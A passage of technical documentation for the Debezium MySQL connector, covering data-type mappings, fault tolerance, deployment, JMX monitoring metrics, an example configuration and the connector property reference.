MySQL allows http://dev.mysql.com/doc/refman/5.7/en/date-and-time-types.html[zero-values] for `DATE`, `DATETIME`, and `TIMESTAMP` columns, which are sometimes preferred over null values. These values cannot be represented using any of the Java types with either of the `time.precision.mode` options, and therefore the MySQL connector will represent them as `null` values when the column definition allows nulls, or as the _epoch day_ when the column does not allow nulls.

[[temporal-values-without-timezone]]
===== Temporal values without time zone

The `DATETIME` type represents a local date and time such as "2018-01-13 09:48:27",
i.e. there is no time zone information.
Such columns are converted into epoch milliseconds or microseconds (based on the column's precision) using UTC.
So e.g. the value "2018-06-20 06:37:03" of a column of type `DATETIME` (no precision given) will be represented by the value 1529476623000.

The `TIMESTAMP` type represents a timestamp without time zone information and is converted by MySQL from the server's (or session's) current time zone into UTC when writing and vice versa when reading back the value.
Such columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server's (or session's) current time zone.
The time zone will be queried from the server by default.
If this fails, it must be specified explicitly using the `database.serverTimezone` connector option.
So if for instance the database's time zone (either globally or configured for the connector by means of the aforementioned option) is "America/Los_Angeles",
the `TIMESTAMP` value "2018-06-20 06:37:03" will be represented by a `ZonedTimestamp` with the value "2018-06-20T13:37:03Z".

Note that the time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.

[WARNING]
====
The handling of these column types is based on using the non-legacy date/time handling mode of the MySQL JDBC connector.
It is therefore strongly advised against passing the `database.useLegacyDatetimeCode` connector option with a value of `true`,
as that may result in unexpected values of temporal columns in emitted change data messages.
====

[[decimal-values]]
==== Decimal values

When the `decimal.handling.mode` configuration property is set to `precise`, the connector will use the predefined Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.
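
For example, a hypothetical `price DECIMAL(8,2)` column holding the value `123.45` would be conveyed as the unscaled integer `12345` (bytes `0x30 0x39`) with a scale of `2` recorded in the field's schema. A sketch of how the field's schema and its serialized value might look with the JSON converter (which renders `BYTES` as Base64):

[source,json,indent=0]
----
{
  "schema": {
    "type": "bytes",
    "name": "org.apache.kafka.connect.data.Decimal",
    "parameters": { "scale": "2" },
    "optional": false,
    "field": "price"
  },
  "payload": "MDk="
}
----

A consumer can then reconstruct the original value as `new BigDecimal(new BigInteger(decodedBytes), scale)`.
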

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`NUMERIC[(M[,D])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal`
|The `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.

|`DECIMAL[(M[,D])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal`
|The `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.

|=======================

However, when the `decimal.handling.mode` configuration property is set to `double`, the connector will represent all `DECIMAL` and `NUMERIC` values as Java double values and encode them as follows:

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`NUMERIC[(M[,D])]`
|`FLOAT64`
|
|

|`DECIMAL[(M[,D])]`
|`FLOAT64`
|
|

|=======================

The last option for the `decimal.handling.mode` configuration property is `string`. In this case the connector will represent all `DECIMAL` and `NUMERIC` values as their formatted string representation and encode them as follows:

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`NUMERIC[(M[,D])]`
|`STRING`
|
|

|`DECIMAL[(M[,D])]`
|`STRING`
|
|

|=======================

[[spatial-types]]
==== Spatial Data Types

As of version 0.5.1, the MySQL connector has limited support for some of the following https://dev.mysql.com/doc/refman/5.7/en/spatial-datatypes.html[spatial data types]:

[cols="20%a,15%a,30%a,35%a",width=150,options="header,footer",role="table table-bordered table-striped"]
|=======================
|Spatial Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`POINT`
|`STRUCT`
|`io.debezium.data.geometry.Point`
|Contains a structure with 2 `FLOAT64` fields, `(x,y)`, each representing a coordinate of a geometric point, and 1 optional `BYTES` field, `wkb`, representing the Well-Known Binary (WKB) encoding of the point's coordinates.

|=======================

As of version 0.7.2, the MySQL connector has full support for all of the following https://dev.mysql.com/doc/refman/5.7/en/spatial-datatypes.html[spatial data types]:

[cols="20%a,15%a,30%a,35%a",width=150,options="header,footer",role="table table-bordered table-striped"]
|=======================
|Spatial Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`GEOMETRY` +
`LINESTRING` +
`POLYGON` +
`MULTIPOINT` +
`MULTILINESTRING` +
`MULTIPOLYGON` +
`GEOMETRYCOLLECTION`
|`STRUCT`
|`io.debezium.data.geometry.Geometry`
|Contains a structure with 2 fields: +

* `srid (INT32)` - the Spatial Reference System Identifier defining the coordinate system in which the geometry object is defined
* `wkb (BYTES)` - a binary representation of the geometry object encoded in the Well-Known Binary format.
Please see the http://www.opengeospatial.org/standards/sfa[Open Geospatial Consortium Simple Features Access specification] for the format details.

|=======================
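
For illustration, a hypothetical `POINT(1 2)` value (SRID 0) might appear in the row's state as a structure like the following sketch (the `wkb` field is Base64-encoded WKB, as rendered by the JSON converter):

[source,json,indent=0]
----
{
  "srid": 0,
  "wkb": "AQEAAAAAAAAAAADwPwAAAAAAAABA"
}
----
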
[[fault-tolerance]]
[[when-things-go-wrong]]
=== When things go wrong

Debezium is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event. Of course, when the system is operating nominally or being administered carefully, Debezium provides _exactly once_ delivery of every change event. However, if a fault does happen, the system will still not lose any events, although while it is recovering from the fault it may repeat some change events. Thus, in these abnormal situations Debezium (like Kafka) provides _at least once_ delivery of change events.

The rest of this section describes how Debezium handles various kinds of faults and problems.

==== Configuration and startup errors

The connector will fail upon startup, report an error/exception in the log, and stop running when the connector's configuration is invalid, when the connector cannot successfully connect to MySQL using the specified connectivity parameters, or when the connector is restarting from a previously-recorded position in the MySQL history (via binlog coordinates or GTID set) and MySQL no longer has that history available.

In these cases, the error will have more details about the problem and possibly a suggested workaround. The connector can be restarted when the configuration has been corrected or the MySQL problem has been addressed.

==== MySQL becomes unavailable

Once the connector is running, if the MySQL server it is connected to becomes unavailable for any reason, the connector will fail with an error and stop. Simply restart the connector when the server is available.

Note that when using GTIDs and a highly available MySQL cluster, you can simply restart the connector immediately, and the connector will connect to a different MySQL server in the cluster, find the location in that server's binlog that represents the last transaction that was processed completely, and start reading the new server's binlog from that location.

When the connector and MySQL are not using GTIDs, the connector records the position within the specific binlog of the MySQL server to which it is connected. These binlog coordinates are only valid on that MySQL server, so to recover, the connector must reconnect to that server (or to another server that has been recovered from backups of the MySQL server).

==== Kafka Connect process stops gracefully

If Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that process Kafka Connect will migrate all of the process's connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off. There will be a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.

==== Kafka Connect process crashes

If the Kafka Connect process stops unexpectedly, then any connector tasks it was running will obviously terminate without recording their most recently-processed offsets. When Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes. However, the MySQL connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash.
The number of duplicate events will depend on the offset flush period and the volume of data changes just before the crash.

[TIP]
====
Because some events may be duplicated during recovery from a failure, consumers should always anticipate duplicates. Debezium change events are idempotent, so a sequence of events always results in the same state.

Debezium also includes with each change event message the source-specific information about the origin of the event, including the MySQL server's time of the event, its binlog filename and position, and the GTID (if used). Consumers can keep track of this information (especially GTIDs) to know whether they have already seen a particular event.
====

==== Kafka becomes unavailable

As the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency you've specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.

==== Connector is stopped for a duration

If the connector is gracefully stopped, the database can continue to be used and any new changes will be recorded in the MySQL server's binlog. When the connector is restarted, it will resume reading the MySQL binlog where it last left off, recording change events for all of the changes that were made while the connector was stopped.

A properly configured Kafka cluster is capable of https://engineering.linkedin.com/kafka/benchmarking-apache-kafka-2-million-writes-second-three-cheap-machines[massive throughput]. Kafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events. Because of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MySQL.

[NOTE]
====
If the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will perform an initial snapshot. On the other hand, if the connector's snapshot mode is disabled, then the connector will fail with an error.
====

[[configuration]]
[[deploying-a-connector]]
== Deploying a connector

If you've already installed https://zookeeper.apache.org[Zookeeper], http://kafka.apache.org/[Kafka], and http://kafka.apache.org/documentation.html#connect[Kafka Connect], then using Debezium's MySQL connector is easy.
Simply download the https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[connector's plugin archive], extract the JARs into your Kafka Connect environment, and add the directory with the JARs to https:\/\/docs.confluent.io\/current\/connect\/userguide.html#installing-plugins[Kafka Connect's classpath]. Restart your Kafka Connect process to pick up the new JARs.\n\nIf immutable containers are your thing, then check out https:\/\/hub.docker.com\/r\/debezium\/[Debezium's Docker images] for Zookeeper, Kafka, and Kafka Connect with the MySQL connector already pre-installed and ready to go. Our link:http:\/\/debezium.io\/docs\/tutorial[tutorial] even walks you through using these images, and this is a great way to learn what Debezium is all about. You can even link:\/blog\/2016\/05\/31\/Debezium-on-Kubernetes\/[run Debezium on Kubernetes and OpenShift].\n\nTo use the connector to produce change events for a particular MySQL server or cluster, simply create a link:#configuration[configuration file for the MySQL Connector] and use the link:https:\/\/docs.confluent.io\/current\/connect\/references\/restapi.html[Kafka Connect REST API] to add that connector to your Kafka Connect cluster. When the connector starts, it will grab a consistent snapshot of the databases in your MySQL server and start reading the MySQL binlog, producing events for every inserted, updated, and deleted row. The connector can optionally produce events with the DDL statements that were applied, and you can even choose to produce events for a subset of the databases and tables. Optionally ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[[monitoring]]\n=== Monitoring\n\nKafka, Zookeeper, and Kafka Connect all have link:\/docs\/monitoring\/[built-in support] for JMX metrics. The MySQL connector also publishes a number of metrics about the connector's activities that can be monitored through JMX. The connector has two types of metrics. Snapshot metrics help you monitor the snapshot activity and are available when the connector is performing a snapshot. Binlog metrics help you monitor the progress and activity while the connector reads the MySQL binlog.\n\n[[monitoring-snapshots]]\n[[snapshot-metrics]]\n==== Snapshot Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`TotalTableCount`\n|`int`\n|The total number of tables that are being included in the snapshot.\n\n|`RemainingTableCount`\n|`int`\n|The number of tables that the snapshot has yet to copy.\n\n|`HoldingGlobalLock`\n|`boolean`\n|Whether the connector currently holds a global or table write lock.\n\n|`SnapshotRunning`\n|`boolean`\n|Whether the snapshot was started.\n\n|`SnapshotAborted`\n|`boolean`\n|Whether the snapshot was aborted.\n\n|`SnapshotCompleted`\n|`boolean`\n|Whether the snapshot completed.\n\n|`SnapshotDurationInSeconds`\n|`long`\n|The total number of seconds that the snapshot has taken so far, even if not complete.\n\n|`RowsScanned`\n|`Map<String, Long>`\n|Map containing the number of rows scanned for each table in the snapshot. Tables are incrementally added to the Map during processing. 
Updates every 10,000 rows scanned and upon completing a table.
|=======================


[[monitoring-binlog]]
[[binlog-metrics]]
==== Binlog Metrics

===== *MBean: debezium.mysql:type=connector-metrics,context=binlog,server=_<database.server.name>_*

[cols="30%a,10%a,60%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|Attribute Name
|Type
|Description

|`Connected`
|`boolean`
|Flag that denotes whether the connector is currently connected to the MySQL server.

|`BinlogFilename`
|`string`
|The name of the binlog file that the connector has most recently read.

|`BinlogPosition`
|`long`
|The most recent position (in bytes) within the binlog that the connector has read.

|`IsGtidModeEnabled`
|`boolean`
|Flag that denotes whether the connector is currently tracking GTIDs from the MySQL server.

|`GtidSet`
|`string`
|The string representation of the most recent GTID set seen by the connector when reading the binlog.

|`LastEvent`
|`string`
|The last binlog event that the connector has read.

|`SecondsSinceLastEvent`
|`long`
|The number of seconds since the connector has read and processed the most recent event.

|`SecondsBehindMaster`
|`long`
|The number of seconds between the last event's MySQL timestamp and the connector processing it. The values will incorporate any differences between the clocks on the machines where the MySQL server and the MySQL connector are running.

|`TotalNumberOfEventsSeen`
|`long`
|The total number of events that this connector has seen since it was last started or reset.

|`NumberOfSkippedEvents`
|`long`
|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.

|`NumberOfEventsFiltered`
|`long`
|The number of events that have been filtered by whitelist or blacklist filtering rules configured on the connector.

|`NumberOfDisconnects`
|`long`
|The number of disconnects by the MySQL connector.

|`NumberOfCommittedTransactions`
|`long`
|The number of processed transactions that were committed.

|`NumberOfRolledBackTransactions`
|`long`
|The number of processed transactions that were rolled back and not streamed.

|`NumberOfNotWellFormedTransactions`
|`long`
|The number of transactions that have not conformed to the expected protocol of `BEGIN` + `COMMIT`/`ROLLBACK`. Should be `0` under normal conditions.

|`NumberOfLargeTransactions`
|`long`
|The number of transactions that have not fit into the look-ahead buffer. Should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions` for optimal performance.
|=======================
_Note:_ The transaction-related attributes are available only if binlog event buffering is enabled - see `binlog.buffer.size` for more details.



[[example]]
[[example-configuration]]
=== Example configuration

Using the MySQL connector is straightforward.
Here is an example of the configuration for a MySQL connector that monitors a MySQL server at port 3306 on 192.168.99.100, which we logically name `fullfillment`:

[source,json]
----
{
  "name": "inventory-connector", // <1>
  "config": {
    "connector.class": "io.debezium.connector.mysql.MySqlConnector", // <2>
    "database.hostname": "192.168.99.100", // <3>
    "database.port": "3306", // <4>
    "database.user": "debezium", // <5>
    "database.password": "dbz", // <6>
    "database.server.id": "184054", // <7>
    "database.server.name": "fullfillment", // <8>
    "database.whitelist": "inventory", // <9>
    "database.history.kafka.bootstrap.servers": "kafka:9092", // <10>
    "database.history.kafka.topic": "dbhistory.fullfillment", // <11>
    "include.schema.changes": "true" // <12>
  }
}
----
<1> The name of our connector when we register it with a Kafka Connect service.
<2> The name of this MySQL connector class.
<3> The address of the MySQL server.
<4> The port number of the MySQL server.
<5> The name of the MySQL user that has the link:#mysql-user[required privileges].
<6> The password for the MySQL user that has the link:#mysql-user[required privileges].
<7> The connector's identifier that must be unique within the MySQL cluster and similar to MySQL's `server-id` configuration property.
<8> The logical name of the MySQL server/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the link:#avro-converter[Avro Converter] is used.
<9> A list of all databases hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the databases and tables to include or exclude from monitoring.
<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database history topic.
<11> The name of the link:#database-schema-history[database history topic] where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.
<12> The flag specifying that the connector should generate events on the link:#schema-change-topic[schema change topic] named `fullfillment` with the DDL changes, which _can_ be used by consumers.

See the link:#connector-properties[complete list of connector properties] that can be specified in these configurations.

This configuration can be sent via POST to a running Kafka Connect service, which will then record the configuration and start up the one connector task that will connect to the MySQL database, read the binlog, and record events to Kafka topics.


[[connector-properties]]
=== Connector properties

The following configuration properties are _required_ unless a default value is available.

[cols="35%a,10%a,55%a",options="header,footer",role="table table-bordered table-striped"]
|=======================
|Property
|Default
|Description

|`name`
|
|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)

|`connector.class`
|
|The name of the Java class for the connector. Always use a value of `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.

|`tasks.max`
|`1`
|The maximum number of tasks that should be created for this connector.
The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.

|`database.hostname`
|
|IP address or hostname of the MySQL database server.

|`database.port`
|`3306`
|Integer port number of the MySQL database server.

|`database.user`
|
|Name of the MySQL user to use when connecting to the MySQL database server.

|`database.password`
|
|Password to use when connecting to the MySQL database server.

|`database.server.name`
|_host:port_
|Logical name that identifies and provides a namespace for the particular MySQL database server/cluster being monitored. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names emanating from this connector. Defaults to '_host_:_port_', where _host_ is the value of the `database.hostname` property and _port_ is the value of the `database.port` property, though we recommend using an explicit and meaningful logical name.

|`database.server.id`
|_random_
|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though we recommend setting an explicit value.

|`database.history.kafka.topic`
|
|The full name of the Kafka topic where the connector will store the database schema history.

|`database.history{zwsp}.kafka.bootstrap.servers`
|
|A list of host/port pairs that the connector will use for establishing an initial connection to the Kafka cluster. This connection will be used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. This should point to the same Kafka cluster used by the Kafka Connect process.

|`database.whitelist`
|_empty string_
|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in the whitelist will be excluded from monitoring. By default all databases will be monitored. May not be used with `database.blacklist`.

|`database.blacklist`
|_empty string_
|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in the blacklist will be monitored. May not be used with `database.whitelist`.

|`table.whitelist`
|_empty string_
|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be monitored; any table not included in the whitelist will be excluded from monitoring. Each identifier is of the form _databaseName_._tableName_. By default the connector will monitor every non-system table in each monitored database. May not be used with `table.blacklist`.

|`table.blacklist`
|_empty string_
|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be excluded from monitoring; any table not included in the blacklist will be monitored. Each identifier is of the form _databaseName_._tableName_. May not be used with `table.whitelist`.

|`column.blacklist`
|_empty string_
|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values.
Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.

|`column.truncate.to._length_.chars`
|_n/a_
|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event message values if the field values are longer than the specified number of characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.

|`column.mask.with._length_.chars`
|_n/a_
|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.

|`column.propagate.source.type` 0.8.0 and later
|_n/a_
|An optional comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change messages.
The schema parameters `pass:[_]pass:[_]debezium.source.column.type`, `pass:[_]pass:[_]debezium.source.column.length` and `pass:[_]pass:[_]debezium.source.column.scale` will be used to propagate the original type name, length, and scale (for variable-width types), respectively.
Useful to properly size corresponding columns in sink databases.
Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.

|`time.precision.mode`
|`adaptive_time{zwsp}_microseconds`
| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds; `adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision. See <<temporal-values>>.

|`decimal.handling.mode` +
`string` in 0.7.4 and later
|`precise`
| Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: `precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form; or `double` represents them using `double` values, which may result in a loss of precision but will be far easier to use.
The `string` option encodes values as formatted strings, which is easy to consume but loses the semantic information about the real type. See <<decimal-values>>.

|`bigint.unsigned.handling.mode` +
0.6.1 and later
|`long`
| Specifies how BIGINT UNSIGNED columns should be represented in change events, including: `precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type; `long` (the default) represents values using Java's `long`, which may not offer the same precision but will be far easier to use in consumers. `long` is usually the preferable setting. Only when working with values larger than 2^63 should the `precise` setting be used, as those values cannot be conveyed using `long`. See <<data-types>>.

|`include.schema.changes`
|`true`
|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change will be recorded using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. The default is `true`.

|`include.query`
|`false`
|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +
Note: This option requires MySQL to be configured with the binlog_rows_query_log_events option set to ON. The query will not be present for events generated from the snapshot process. +
WARNING: Enabling this option may expose tables or fields explicitly blacklisted or masked by including the original SQL statement in the change event. For this reason the option defaults to 'false'.

|`event.deserialization{zwsp}.failure.handling.mode` +
0.6.2 and later
|`fail`
| Specifies how the connector should react to exceptions during deserialization of binlog events.
`fail` will propagate the exception (indicating the problematic event and its binlog offset), causing the connector to stop. +
`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged
(make sure that link:/docs/configuration/logging/[the logger] is set to the `WARN` or `ERROR` level). +
`ignore` will cause the problematic event to be skipped.

|`inconsistent.schema.handling.mode` +
0.7.3 and later
|`fail`
| Specifies how the connector should react to binlog events that relate to tables that are not present in the internal schema representation (i.e., the internal representation is not consistent with the database).
`fail` will throw an exception (indicating the problematic event and its binlog offset), causing the connector to stop. +
`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged
(make sure that link:/docs/configuration/logging/[the logger] is set to the `WARN` or `ERROR` level). +
`ignore` will cause the problematic event to be skipped.

|`max.queue.size`
|`8192`
|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slower or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector.
Defaults to 8192, and should always be larger than the maximum batch size specified in the `max.batch.size` property.

|`max.batch.size`
|`2048`
|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.

|`poll.interval.ms`
|`1000`
|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.

|`connect.timeout.ms`
|`30000`
|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.

|`gtid.source.includes`
|
|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching one of these include patterns will be used. May not be used with `gtid.source.excludes`.

|`gtid.source.excludes`
|
|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching none of these exclude patterns will be used. May not be used with `gtid.source.includes`.

|`gtid.new.channel.position` +
0.9.0 and later
|`latest`
| When set to `latest`, when the connector sees a new GTID channel, it will start consuming from the last executed transaction in that GTID channel. If set to `earliest`, the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where Debezium is connected to the master; in this case, during failover, the slave with a new UUID (and GTID channel) starts receiving writes before Debezium is connected. These writes would be lost when using `latest`.

|`tombstones.on.delete` +
0.7.3 and later
|`true`
| Controls whether a tombstone event should be generated after a delete event. +
When `true` the delete operations are represented by a delete event and a subsequent tombstone event. When `false` only a delete event is sent. +
Emitting the tombstone event (the default behavior) allows Kafka to completely delete all events pertaining to the given key once the source record is deleted.

|`ddl.parser.mode` +
0.8.0 and later
|`antlr`
| Controls which parser should be used for parsing DDL statements when building up the meta-model of the captured database structure. +
Can be one of `legacy` (for the legacy hand-written parser implementation) or `antlr` (for the new Antlr based implementation introduced in Debezium 0.8.0). +
The legacy parser was the default in Debezium 0.8.x; please try out the new implementation and report back any issues you encounter. +
\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"35%a,10%a,55%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`connect.keep.alive`\n|`true`\n|A boolean value that specifies whether a separate thread should be used to ensure the connection to the MySQL server\/cluster is kept alive.\n\n|`table.ignore.builtin`\n|`true`\n|Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table whitelist or blacklists. By default system tables are excluded from monitoring, and no events are generated when changes are made to any of the system tables.\n\n|`database.history.kafka.recovery.poll.interval.ms`\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|`database.history.kafka.recovery.attempts`\n|`4`\n|The maximum number of times that the connector should attempt to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|`database.history.skip.unparseable.ddl`\n|`false`\n|Boolean value that specifies whether the connector should ignore malformed or unknown database statements, or stop processing so that the operator can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when the binlog is processed.\n\n|`database.history.store.only.monitored.tables.ddl` +\n0.7.2 and later\n|`false`\n|Boolean value that specifies whether the connector should record all DDL statements or (when `true`) only those that are relevant to tables that are monitored by Debezium (via filter configuration).\nThe safe default is `false`.\nThis feature should be used only with care as the missing data might be necessary when the filters are changed.\n\n|`database.ssl.mode`\n|`disabled`\n|Specifies whether to use an encrypted connection. The default is `disabled`, and specifies to use an unencrypted connection.\n\nThe `preferred` option establishes an encrypted connection if the server supports secure connections but falls back to an unencrypted connection otherwise.\n\nThe `required` option establishes an encrypted connection but will fail if one cannot be made for any reason.\n\nThe `verify_ca` option behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and will fail if it doesn't match any valid CA certificates.\n\nThe `verify_identity` option behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|`binlog.buffer.size` +\n0.7.0 and later\n|0\n|The size of a look-ahead buffer used by the binlog reader. +\nUnder specific conditions it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. 
+\nWhen the beginning of a transaction is detected, Debezium tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can decide whether the changes from the transaction will be streamed or not.\nThe size of the buffer defines the maximum number of changes in the transaction that Debezium can buffer while searching for transaction boundaries.\nIf the transaction is larger than the buffer then Debezium needs to rewind and re-read the events that did not fit into the buffer while streaming. Value `0` disables buffering. +\nDisabled by default. +\n_Note:_ This feature should be considered an incubating one. We are looking for feedback from customers, and it is expected that the feature is not completely polished.\n\n|`snapshot.mode`\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is `initial`, and specifies that the connector can run a snapshot only when no offsets have been recorded for the logical server name. The `when_needed` option specifies that the connector run a snapshot upon startup whenever it deems it necessary (when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server). The `never` option specifies that the connector should never use snapshots and that upon first startup with a logical server name the connector should read from the beginning of the binlog; this should be used with care, as it is only valid when the binlog is guaranteed to contain the entire history of the database. If you don't need the topics to contain a consistent snapshot of the data but only need them to have the changes since the connector was started, you can use the `schema_only` option, where the connector only snapshots the schemas (not the data).\n\n`schema_only_recovery` is a recovery option for an existing connector to recover a corrupted or lost database history topic, or to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly.\n\n|`snapshot.locking.mode` +\n_0.7.3 and later_\n|`minimal`\n|Controls if and how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. There are three possible values: `minimal`, `extended`, and `none`. +\n\n`minimal` The connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the REPEATABLE READ transaction even when the global read lock is no longer held and while other MySQL clients are updating the database. +\n\n`extended` In some cases where clients are submitting operations that MySQL excludes from REPEATABLE READ semantics, it may be desirable to block all writes for the entire duration of the snapshot. For such cases, use this option. +\n\n`none` Will prevent the connector from acquiring any table locks during the snapshot process. This value can be used with all snapshot modes but it is safe to use if and _only_ if no schema changes are happening while the snapshot is taken. Note that tables defined with the MyISAM engine would still be locked despite this property being set, as MyISAM acquires a table lock. 
